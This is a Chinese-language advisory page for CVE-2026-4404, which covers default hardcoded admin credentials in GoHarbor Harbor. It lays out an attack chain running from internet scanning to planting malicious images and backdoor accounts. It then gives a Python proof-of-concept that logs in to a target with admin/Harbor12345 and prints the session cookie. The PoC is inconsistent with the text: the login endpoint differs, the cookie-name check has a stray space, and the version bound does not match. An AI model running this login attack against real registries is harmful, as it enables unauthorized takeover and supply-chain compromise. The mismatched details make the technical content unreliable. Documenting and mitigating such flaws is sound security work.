CVE-2026-4404 CVSS 9.4 严重

CVE-2026-4404 GoHarbor Harbor硬编码凭证漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4404

漏洞类型

硬编码凭证

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GoHarbor Harbor

漏洞概述

GoHarbor Harbor版本2.15.0及以下存在硬编码凭证漏洞。由于系统默认配置中使用了固定的管理员用户名和密码，若管理员未在部署后及时修改，攻击者可利用这些默认凭证远程登录Web管理界面。该漏洞无需用户交互即可被利用，导致攻击者获得系统完全控制权，造成容器镜像泄露或篡改。

技术细节

该漏洞根因在于GoHarbor Harbor在2.15.0及以下版本的默认安装配置中，使用了硬编码的默认管理员凭证（通常为admin/Harbor12345）。在标准的部署流程中，如果未在harbor.yml配置文件中显式覆盖密码，系统初始化时会自动应用这些弱凭据。攻击者只需向目标服务器的/api/v2.0/login端点发送包含默认凭据的POST请求，即可绕过身份验证机制获取有效的Session Token。由于CVSS评分为9.4，且攻击向量为网络（AV:N）、无需权限（PR:N）、无需交互（UI:N），该漏洞极易被自动化工具扫描利用。一旦获得管理员权限，攻击者可以对仓库中的所有镜像进行完全读写操作，窃取敏感的构建信息，或植入恶意镜像以感染下游使用环境，严重威胁软件供应链安全。

攻击链分析

STEP 1

1. 信息收集

攻击者使用端口扫描或网络空间测绘引擎（如Shodan、ZoomEye）寻找开放在互联网上的GoHarbor Harbor服务。

STEP 2

2. 尝试登录

攻击者向目标的登录接口发送POST请求，Payload包含默认的用户名admin和密码Harbor12345。

STEP 3

3. 获取权限

服务器验证通过并返回Session Cookie或JWT Token，攻击者成功获得管理员权限。

STEP 4

4. 后利用

攻击者利用管理员权限窃取私有镜像代码、植入恶意镜像或创建后门账户，维持对系统的持久控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "https://<target_harbor_ip>"
login_url = f"{target_host}/c/login"

# Default hardcoded credentials for Harbor < 2.15.0
data = {
    "principal": "admin",
    "password": "Harbor12345"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "application/json"
}

try:
    print(f"[*] Attempting to login to {target_host} using hardcoded credentials...")
    response = requests.post(login_url, data=data, headers=headers, verify=False, timeout=10)

    if response.status_code == 200:
        # Check if authorization cookie or token is present
        if " Harbor" in response.cookies.get_dict():
            print("[+] Exploit successful! Logged in as admin.")
            print("[+] Session Cookie:", response.cookies.get_dict())
        else:
            print("[-] Login failed. Credentials might have been changed.")
    else:
        print(f"[-] HTTP Error: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

GoHarbor Harbor <= 2.15.0

防御指南

临时缓解措施

对于无法立即升级的环境，管理员应立即登录Harbor控制台检查admin账户密码是否为默认值。如果是，必须立即更改。同时，建议将Harbor服务部署在内网环境，并配置反向代理进行访问控制，禁止直接从公网访问Web管理界面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表